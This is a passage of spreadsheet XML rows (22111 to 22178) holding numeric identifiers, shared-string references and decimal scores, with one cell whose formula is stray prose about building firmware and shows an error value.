      </c>
      <c r="C22111" s="2" t="s">
        <v>21353</v>
      </c>
      <c r="D22111" s="2">
        <v>1.0</v>
      </c>
      <c r="E22111" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22111" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22112" ht="15.75" customHeight="1">
      <c r="A22112" s="1">
        <v>20057.0</v>
      </c>
      <c r="B22112" s="2">
        <v>8266302.0</v>
      </c>
      <c r="C22112" s="2" t="s">
        <v>21354</v>
      </c>
      <c r="D22112" s="2">
        <v>1.0</v>
      </c>
      <c r="E22112" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22112" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22113" ht="15.75" customHeight="1">
      <c r="A22113" s="1">
        <v>20419.0</v>
      </c>
      <c r="B22113" s="2">
        <v>1.2296553E7</v>
      </c>
      <c r="C22113" s="2" t="s">
        <v>21355</v>
      </c>
      <c r="D22113" s="2">
        <v>1.0</v>
      </c>
      <c r="E22113" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22113" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22114" ht="15.75" customHeight="1">
      <c r="A22114" s="1">
        <v>21223.0</v>
      </c>
      <c r="B22114" s="2">
        <v>1.9609659E7</v>
      </c>
      <c r="C22114" s="2" t="s">
        <v>21356</v>
      </c>
      <c r="D22114" s="2">
        <v>1.0</v>
      </c>
      <c r="E22114" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22114" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22115" ht="15.75" customHeight="1">
      <c r="A22115" s="1">
        <v>22096.0</v>
      </c>
      <c r="B22115" s="2">
        <v>3.0788889E7</v>
      </c>
      <c r="C22115" s="2" t="s">
        <v>21357</v>
      </c>
      <c r="D22115" s="2">
        <v>1.0</v>
      </c>
      <c r="E22115" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22115" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22116" ht="15.75" customHeight="1">
      <c r="A22116" s="1">
        <v>22324.0</v>
      </c>
      <c r="B22116" s="2">
        <v>3.4051875E7</v>
      </c>
      <c r="C22116" s="2" t="s">
        <v>21358</v>
      </c>
      <c r="D22116" s="2">
        <v>1.0</v>
      </c>
      <c r="E22116" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22116" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22117" ht="15.75" customHeight="1">
      <c r="A22117" s="1">
        <v>24148.0</v>
      </c>
      <c r="B22117" s="2">
        <v>1.0074892E7</v>
      </c>
      <c r="C22117" s="2" t="s">
        <v>21359</v>
      </c>
      <c r="D22117" s="2">
        <v>1.0</v>
      </c>
      <c r="E22117" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22117" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22118" ht="15.75" customHeight="1">
      <c r="A22118" s="1">
        <v>25359.0</v>
      </c>
      <c r="B22118" s="2">
        <v>1.3592787E7</v>
      </c>
      <c r="C22118" s="2" t="s">
        <v>21360</v>
      </c>
      <c r="D22118" s="2">
        <v>1.0</v>
      </c>
      <c r="E22118" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22118" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22119" ht="15.75" customHeight="1">
      <c r="A22119" s="1">
        <v>25923.0</v>
      </c>
      <c r="B22119" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C22119" s="2" t="s">
        <v>21361</v>
      </c>
      <c r="D22119" s="2">
        <v>1.0</v>
      </c>
      <c r="E22119" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22119" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22120" ht="15.75" customHeight="1">
      <c r="A22120" s="1">
        <v>25930.0</v>
      </c>
      <c r="B22120" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C22120" s="2" t="s">
        <v>21361</v>
      </c>
      <c r="D22120" s="2">
        <v>1.0</v>
      </c>
      <c r="E22120" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22120" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22121" ht="15.75" customHeight="1">
      <c r="A22121" s="1">
        <v>26242.0</v>
      </c>
      <c r="B22121" s="2">
        <v>1.6288174E7</v>
      </c>
      <c r="C22121" s="2" t="s">
        <v>21362</v>
      </c>
      <c r="D22121" s="2">
        <v>1.0</v>
      </c>
      <c r="E22121" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22121" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22122" ht="15.75" customHeight="1">
      <c r="A22122" s="1">
        <v>27460.0</v>
      </c>
      <c r="B22122" s="2">
        <v>2.1987101E7</v>
      </c>
      <c r="C22122" s="2" t="s">
        <v>21363</v>
      </c>
      <c r="D22122" s="2">
        <v>1.0</v>
      </c>
      <c r="E22122" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22122" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22123" ht="15.75" customHeight="1">
      <c r="A22123" s="1">
        <v>28082.0</v>
      </c>
      <c r="B22123" s="2">
        <v>2.4629072E7</v>
      </c>
      <c r="C22123" s="2" t="s">
        <v>21364</v>
      </c>
      <c r="D22123" s="2">
        <v>1.0</v>
      </c>
      <c r="E22123" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22123" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22124" ht="15.75" customHeight="1">
      <c r="A22124" s="1">
        <v>28699.0</v>
      </c>
      <c r="B22124" s="2">
        <v>2.7721025E7</v>
      </c>
      <c r="C22124" s="2" t="s">
        <v>21205</v>
      </c>
      <c r="D22124" s="2">
        <v>1.0</v>
      </c>
      <c r="E22124" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22124" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22125" ht="15.75" customHeight="1">
      <c r="A22125" s="1">
        <v>29280.0</v>
      </c>
      <c r="B22125" s="2">
        <v>3.0994721E7</v>
      </c>
      <c r="C22125" s="2" t="s">
        <v>21365</v>
      </c>
      <c r="D22125" s="2">
        <v>1.0</v>
      </c>
      <c r="E22125" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22125" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22126" ht="15.75" customHeight="1">
      <c r="A22126" s="1">
        <v>31052.0</v>
      </c>
      <c r="B22126" s="2">
        <v>4.7958379E7</v>
      </c>
      <c r="C22126" s="2" t="s">
        <v>21366</v>
      </c>
      <c r="D22126" s="2">
        <v>1.0</v>
      </c>
      <c r="E22126" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22126" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22127" ht="15.75" customHeight="1">
      <c r="A22127" s="1">
        <v>32118.0</v>
      </c>
      <c r="B22127" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C22127" s="2" t="s">
        <v>21367</v>
      </c>
      <c r="D22127" s="2">
        <v>1.0</v>
      </c>
      <c r="E22127" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22127" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22128" ht="15.75" customHeight="1">
      <c r="A22128" s="1">
        <v>33248.0</v>
      </c>
      <c r="B22128" s="2">
        <v>7331695.0</v>
      </c>
      <c r="C22128" s="2" t="s">
        <v>21191</v>
      </c>
      <c r="D22128" s="2">
        <v>1.0</v>
      </c>
      <c r="E22128" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22128" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22129" ht="15.75" customHeight="1">
      <c r="A22129" s="1">
        <v>1071.0</v>
      </c>
      <c r="B22129" s="2">
        <v>2.356643E7</v>
      </c>
      <c r="C22129" s="2" t="s">
        <v>21368</v>
      </c>
      <c r="D22129" s="2">
        <v>1.0</v>
      </c>
      <c r="E22129" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22129" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22130" ht="15.75" customHeight="1">
      <c r="A22130" s="1">
        <v>2529.0</v>
      </c>
      <c r="B22130" s="2">
        <v>3.409259E7</v>
      </c>
      <c r="C22130" s="2" t="s">
        <v>21369</v>
      </c>
      <c r="D22130" s="2">
        <v>1.0</v>
      </c>
      <c r="E22130" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22130" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22131" ht="15.75" customHeight="1">
      <c r="A22131" s="1">
        <v>3127.0</v>
      </c>
      <c r="B22131" s="2">
        <v>3.6840169E7</v>
      </c>
      <c r="C22131" s="2" t="s">
        <v>21370</v>
      </c>
      <c r="D22131" s="2">
        <v>1.0</v>
      </c>
      <c r="E22131" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22131" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22132" ht="15.75" customHeight="1">
      <c r="A22132" s="1">
        <v>6150.0</v>
      </c>
      <c r="B22132" s="2">
        <v>4.7855831E7</v>
      </c>
      <c r="C22132" s="2" t="s">
        <v>21371</v>
      </c>
      <c r="D22132" s="2">
        <v>1.0</v>
      </c>
      <c r="E22132" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22132" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22133" ht="15.75" customHeight="1">
      <c r="A22133" s="1">
        <v>6949.0</v>
      </c>
      <c r="B22133" s="2">
        <v>4.9952487E7</v>
      </c>
      <c r="C22133" s="2" t="s">
        <v>21372</v>
      </c>
      <c r="D22133" s="2">
        <v>1.0</v>
      </c>
      <c r="E22133" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22133" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22134" ht="15.75" customHeight="1">
      <c r="A22134" s="1">
        <v>7914.0</v>
      </c>
      <c r="B22134" s="2">
        <v>5.2499758E7</v>
      </c>
      <c r="C22134" s="2" t="s">
        <v>21373</v>
      </c>
      <c r="D22134" s="2">
        <v>1.0</v>
      </c>
      <c r="E22134" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22134" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22135" ht="15.75" customHeight="1">
      <c r="A22135" s="1">
        <v>8021.0</v>
      </c>
      <c r="B22135" s="2">
        <v>5.2804441E7</v>
      </c>
      <c r="C22135" s="2" t="s">
        <v>21374</v>
      </c>
      <c r="D22135" s="2">
        <v>1.0</v>
      </c>
      <c r="E22135" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22135" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22136" ht="15.75" customHeight="1">
      <c r="A22136" s="1">
        <v>9619.0</v>
      </c>
      <c r="B22136" s="2">
        <v>5.6203639E7</v>
      </c>
      <c r="C22136" s="2" t="s">
        <v>21375</v>
      </c>
      <c r="D22136" s="2">
        <v>1.0</v>
      </c>
      <c r="E22136" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22136" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22137" ht="15.75" customHeight="1">
      <c r="A22137" s="1">
        <v>9991.0</v>
      </c>
      <c r="B22137" s="2">
        <v>5.6981779E7</v>
      </c>
      <c r="C22137" s="2" t="s">
        <v>21376</v>
      </c>
      <c r="D22137" s="2">
        <v>1.0</v>
      </c>
      <c r="E22137" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22137" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22138" ht="15.75" customHeight="1">
      <c r="A22138" s="1">
        <v>10523.0</v>
      </c>
      <c r="B22138" s="2">
        <v>1.2036639E7</v>
      </c>
      <c r="C22138" s="2" t="s">
        <v>21377</v>
      </c>
      <c r="D22138" s="2">
        <v>1.0</v>
      </c>
      <c r="E22138" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22138" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22139" ht="15.75" customHeight="1">
      <c r="A22139" s="1">
        <v>12068.0</v>
      </c>
      <c r="B22139" s="2">
        <v>2.661134E7</v>
      </c>
      <c r="C22139" s="2" t="s">
        <v>21378</v>
      </c>
      <c r="D22139" s="2">
        <v>1.0</v>
      </c>
      <c r="E22139" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22139" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22140" ht="15.75" customHeight="1">
      <c r="A22140" s="1">
        <v>12712.0</v>
      </c>
      <c r="B22140" s="2">
        <v>3.0838789E7</v>
      </c>
      <c r="C22140" s="2" t="s">
        <v>21379</v>
      </c>
      <c r="D22140" s="2">
        <v>1.0</v>
      </c>
      <c r="E22140" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22140" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22141" ht="15.75" customHeight="1">
      <c r="A22141" s="1">
        <v>13650.0</v>
      </c>
      <c r="B22141" s="2">
        <v>3.5943214E7</v>
      </c>
      <c r="C22141" s="2" t="s">
        <v>21380</v>
      </c>
      <c r="D22141" s="2">
        <v>1.0</v>
      </c>
      <c r="E22141" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22141" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22142" ht="15.75" customHeight="1">
      <c r="A22142" s="1">
        <v>14122.0</v>
      </c>
      <c r="B22142" s="2">
        <v>3.7815729E7</v>
      </c>
      <c r="C22142" s="2" t="s">
        <v>21381</v>
      </c>
      <c r="D22142" s="2">
        <v>1.0</v>
      </c>
      <c r="E22142" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22142" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22143" ht="15.75" customHeight="1">
      <c r="A22143" s="1">
        <v>16562.0</v>
      </c>
      <c r="B22143" s="2">
        <v>4.6861405E7</v>
      </c>
      <c r="C22143" s="2" t="s">
        <v>21382</v>
      </c>
      <c r="D22143" s="2">
        <v>1.0</v>
      </c>
      <c r="E22143" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22143" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22144" ht="15.75" customHeight="1">
      <c r="A22144" s="1">
        <v>17339.0</v>
      </c>
      <c r="B22144" s="2">
        <v>4.9395171E7</v>
      </c>
      <c r="C22144" s="2" t="s">
        <v>21383</v>
      </c>
      <c r="D22144" s="2">
        <v>1.0</v>
      </c>
      <c r="E22144" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22144" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22145" ht="15.75" customHeight="1">
      <c r="A22145" s="1">
        <v>17403.0</v>
      </c>
      <c r="B22145" s="2">
        <v>4.9635552E7</v>
      </c>
      <c r="C22145" s="2" t="s">
        <v>21384</v>
      </c>
      <c r="D22145" s="2">
        <v>1.0</v>
      </c>
      <c r="E22145" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22145" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22146" ht="15.75" customHeight="1">
      <c r="A22146" s="1">
        <v>17828.0</v>
      </c>
      <c r="B22146" s="2">
        <v>5.0921976E7</v>
      </c>
      <c r="C22146" s="2" t="s">
        <v>21385</v>
      </c>
      <c r="D22146" s="2">
        <v>1.0</v>
      </c>
      <c r="E22146" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22146" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22147" ht="15.75" customHeight="1">
      <c r="A22147" s="1">
        <v>18319.0</v>
      </c>
      <c r="B22147" s="2">
        <v>5.2392326E7</v>
      </c>
      <c r="C22147" s="2" t="s">
        <v>21386</v>
      </c>
      <c r="D22147" s="2">
        <v>1.0</v>
      </c>
      <c r="E22147" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22147" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22148" ht="15.75" customHeight="1">
      <c r="A22148" s="1">
        <v>18949.0</v>
      </c>
      <c r="B22148" s="2">
        <v>5.4345333E7</v>
      </c>
      <c r="C22148" s="2" t="s">
        <v>20937</v>
      </c>
      <c r="D22148" s="2">
        <v>1.0</v>
      </c>
      <c r="E22148" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22148" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22149" ht="15.75" customHeight="1">
      <c r="A22149" s="1">
        <v>19798.0</v>
      </c>
      <c r="B22149" s="2">
        <v>5.6842149E7</v>
      </c>
      <c r="C22149" s="2" t="s">
        <v>21387</v>
      </c>
      <c r="D22149" s="2">
        <v>1.0</v>
      </c>
      <c r="E22149" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22149" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22150" ht="15.75" customHeight="1">
      <c r="A22150" s="1">
        <v>29464.0</v>
      </c>
      <c r="B22150" s="2">
        <v>3.2333539E7</v>
      </c>
      <c r="C22150" s="2" t="s">
        <v>21388</v>
      </c>
      <c r="D22150" s="2">
        <v>1.0</v>
      </c>
      <c r="E22150" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22150" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22151" ht="15.75" customHeight="1">
      <c r="A22151" s="1">
        <v>33295.0</v>
      </c>
      <c r="B22151" s="2">
        <v>7481580.0</v>
      </c>
      <c r="C22151" s="2" t="s">
        <v>21389</v>
      </c>
      <c r="D22151" s="2">
        <v>1.0</v>
      </c>
      <c r="E22151" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22151" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="22152" ht="15.75" customHeight="1">
      <c r="A22152" s="1">
        <v>18.0</v>
      </c>
      <c r="B22152" s="2">
        <v>1.0373308E7</v>
      </c>
      <c r="C22152" s="2" t="s">
        <v>21390</v>
      </c>
      <c r="D22152" s="2">
        <v>1.0</v>
      </c>
      <c r="E22152" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22152" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="22153" ht="15.75" customHeight="1">
      <c r="A22153" s="1">
        <v>1041.0</v>
      </c>
      <c r="B22153" s="2">
        <v>2.328084E7</v>
      </c>
      <c r="C22153" s="2" t="s">
        <v>21391</v>
      </c>
      <c r="D22153" s="2">
        <v>1.0</v>
      </c>
      <c r="E22153" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22153" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="22154" ht="15.75" customHeight="1">
      <c r="A22154" s="1">
        <v>3517.0</v>
      </c>
      <c r="B22154" s="2">
        <v>3.8594159E7</v>
      </c>
      <c r="C22154" s="2" t="s">
        <v>21392</v>
      </c>
      <c r="D22154" s="2">
        <v>1.0</v>
      </c>
      <c r="E22154" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22154" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="22155" ht="15.75" customHeight="1">
      <c r="A22155" s="1">
        <v>4076.0</v>
      </c>
      <c r="B22155" s="2">
        <v>4.1179166E7</v>
      </c>
      <c r="C22155" s="2" t="s">
        <v>21393</v>
      </c>
      <c r="D22155" s="2">
        <v>1.0</v>
      </c>
      <c r="E22155" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22155" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="22156" ht="15.75" customHeight="1">
      <c r="A22156" s="1">
        <v>7603.0</v>
      </c>
      <c r="B22156" s="2">
        <v>5.1642973E7</v>
      </c>
      <c r="C22156" s="2" t="s">
        <v>21394</v>
      </c>
      <c r="D22156" s="2">
        <v>1.0</v>
      </c>
      <c r="E22156" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22156" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="22157" ht="15.75" customHeight="1">
      <c r="A22157" s="1">
        <v>9178.0</v>
      </c>
      <c r="B22157" s="2">
        <v>5.5367437E7</v>
      </c>
      <c r="C22157" s="2" t="s">
        <v>21395</v>
      </c>
      <c r="D22157" s="2">
        <v>1.0</v>
      </c>
      <c r="E22157" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22157" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="22158" ht="15.75" customHeight="1">
      <c r="A22158" s="1">
        <v>15516.0</v>
      </c>
      <c r="B22158" s="2">
        <v>4.327956E7</v>
      </c>
      <c r="C22158" s="2" t="s">
        <v>21396</v>
      </c>
      <c r="D22158" s="2">
        <v>1.0</v>
      </c>
      <c r="E22158" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22158" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="22159" ht="15.75" customHeight="1">
      <c r="A22159" s="1">
        <v>31313.0</v>
      </c>
      <c r="B22159" s="2">
        <v>4.9700089E7</v>
      </c>
      <c r="C22159" s="2" t="s">
        <v>21397</v>
      </c>
      <c r="D22159" s="2">
        <v>1.0</v>
      </c>
      <c r="E22159" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22159" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="22160" ht="15.75" customHeight="1">
      <c r="A22160" s="1">
        <v>5689.0</v>
      </c>
      <c r="B22160" s="2">
        <v>4.643114E7</v>
      </c>
      <c r="C22160" s="2" t="s">
        <v>21398</v>
      </c>
      <c r="D22160" s="2">
        <v>1.0</v>
      </c>
      <c r="E22160" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22160" s="2">
        <v>0.09865900383141761</v>
      </c>
    </row>
    <row r="22161" ht="15.75" customHeight="1">
      <c r="A22161" s="1">
        <v>13362.0</v>
      </c>
      <c r="B22161" s="2">
        <v>3.4797805E7</v>
      </c>
      <c r="C22161" s="2" t="s">
        <v>21399</v>
      </c>
      <c r="D22161" s="2">
        <v>1.0</v>
      </c>
      <c r="E22161" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22161" s="2">
        <v>0.0986590038314176</v>
      </c>
    </row>
    <row r="22162" ht="15.75" customHeight="1">
      <c r="A22162" s="1">
        <v>1549.0</v>
      </c>
      <c r="B22162" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C22162" s="2" t="s">
        <v>21400</v>
      </c>
      <c r="D22162" s="2">
        <v>1.0</v>
      </c>
      <c r="E22162" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22162" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="22163" ht="15.75" customHeight="1">
      <c r="A22163" s="1">
        <v>6359.0</v>
      </c>
      <c r="B22163" s="2">
        <v>4.8335112E7</v>
      </c>
      <c r="C22163" s="2" t="str">
        <f> New Information =======
I downloaded the "dev" tree and used the Docker image to build the firmware.</f>
        <v>#ERROR!</v>
      </c>
      <c r="D22163" s="2">
        <v>1.0</v>
      </c>
      <c r="E22163" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22163" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="22164" ht="15.75" customHeight="1">
      <c r="A22164" s="1">
        <v>16978.0</v>
      </c>
      <c r="B22164" s="2">
        <v>4.8313394E7</v>
      </c>
      <c r="C22164" s="2" t="s">
        <v>21401</v>
      </c>
      <c r="D22164" s="2">
        <v>1.0</v>
      </c>
      <c r="E22164" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22164" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="22165" ht="15.75" customHeight="1">
      <c r="A22165" s="1">
        <v>17198.0</v>
      </c>
      <c r="B22165" s="2">
        <v>4.8966656E7</v>
      </c>
      <c r="C22165" s="2" t="s">
        <v>21402</v>
      </c>
      <c r="D22165" s="2">
        <v>1.0</v>
      </c>
      <c r="E22165" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22165" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="22166" ht="15.75" customHeight="1">
      <c r="A22166" s="1">
        <v>27646.0</v>
      </c>
      <c r="B22166" s="2">
        <v>2.2765762E7</v>
      </c>
      <c r="C22166" s="2" t="s">
        <v>21403</v>
      </c>
      <c r="D22166" s="2">
        <v>1.0</v>
      </c>
      <c r="E22166" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22166" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="22167" ht="15.75" customHeight="1">
      <c r="A22167" s="1">
        <v>6363.0</v>
      </c>
      <c r="B22167" s="2">
        <v>4.8361622E7</v>
      </c>
      <c r="C22167" s="2" t="s">
        <v>21404</v>
      </c>
      <c r="D22167" s="2">
        <v>1.0</v>
      </c>
      <c r="E22167" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22167" s="2">
        <v>0.09797979797979799</v>
      </c>
    </row>
    <row r="22168" ht="15.75" customHeight="1">
      <c r="A22168" s="1">
        <v>7144.0</v>
      </c>
      <c r="B22168" s="2">
        <v>5.0459111E7</v>
      </c>
      <c r="C22168" s="2" t="s">
        <v>21405</v>
      </c>
      <c r="D22168" s="2">
        <v>1.0</v>
      </c>
      <c r="E22168" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22168" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="22169" ht="15.75" customHeight="1">
      <c r="A22169" s="1">
        <v>4239.0</v>
      </c>
      <c r="B22169" s="2">
        <v>4.1787731E7</v>
      </c>
      <c r="C22169" s="2" t="s">
        <v>21406</v>
      </c>
      <c r="D22169" s="2">
        <v>1.0</v>
      </c>
      <c r="E22169" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22169" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="22170" ht="15.75" customHeight="1">
      <c r="A22170" s="1">
        <v>5693.0</v>
      </c>
      <c r="B22170" s="2">
        <v>4.6457505E7</v>
      </c>
      <c r="C22170" s="2" t="s">
        <v>21407</v>
      </c>
      <c r="D22170" s="2">
        <v>1.0</v>
      </c>
      <c r="E22170" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22170" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="22171" ht="15.75" customHeight="1">
      <c r="A22171" s="1">
        <v>3651.0</v>
      </c>
      <c r="B22171" s="2">
        <v>3.9306177E7</v>
      </c>
      <c r="C22171" s="2" t="s">
        <v>21408</v>
      </c>
      <c r="D22171" s="2">
        <v>1.0</v>
      </c>
      <c r="E22171" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22171" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="22172" ht="15.75" customHeight="1">
      <c r="A22172" s="1">
        <v>13862.0</v>
      </c>
      <c r="B22172" s="2">
        <v>3.6938095E7</v>
      </c>
      <c r="C22172" s="2" t="s">
        <v>21409</v>
      </c>
      <c r="D22172" s="2">
        <v>1.0</v>
      </c>
      <c r="E22172" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22172" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="22173" ht="15.75" customHeight="1">
      <c r="A22173" s="1">
        <v>1120.0</v>
      </c>
      <c r="B22173" s="2">
        <v>2.4098523E7</v>
      </c>
      <c r="C22173" s="2" t="s">
        <v>21410</v>
      </c>
      <c r="D22173" s="2">
        <v>1.0</v>
      </c>
      <c r="E22173" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22173" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="22174" ht="15.75" customHeight="1">
      <c r="A22174" s="1">
        <v>2573.0</v>
      </c>
      <c r="B22174" s="2">
        <v>3.4248288E7</v>
      </c>
      <c r="C22174" s="2" t="s">
        <v>21411</v>
      </c>
      <c r="D22174" s="2">
        <v>1.0</v>
      </c>
      <c r="E22174" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22174" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="22175" ht="15.75" customHeight="1">
      <c r="A22175" s="1">
        <v>13239.0</v>
      </c>
      <c r="B22175" s="2">
        <v>3.4262147E7</v>
      </c>
      <c r="C22175" s="2" t="s">
        <v>21412</v>
      </c>
      <c r="D22175" s="2">
        <v>1.0</v>
      </c>
      <c r="E22175" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22175" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="22176" ht="15.75" customHeight="1">
      <c r="A22176" s="1">
        <v>19013.0</v>
      </c>
      <c r="B22176" s="2">
        <v>5.4521956E7</v>
      </c>
      <c r="C22176" s="2" t="s">
        <v>21413</v>
      </c>
      <c r="D22176" s="2">
        <v>1.0</v>
      </c>
      <c r="E22176" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22176" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="22177" ht="15.75" customHeight="1">
      <c r="A22177" s="1">
        <v>27521.0</v>
      </c>
      <c r="B22177" s="2">
        <v>2.2167347E7</v>
      </c>
      <c r="C22177" s="2" t="s">
        <v>21414</v>
      </c>
      <c r="D22177" s="2">
        <v>1.0</v>
      </c>
      <c r="E22177" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22177" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="22178" ht="15.75" customHeight="1">
      <c r="A22178" s="1">
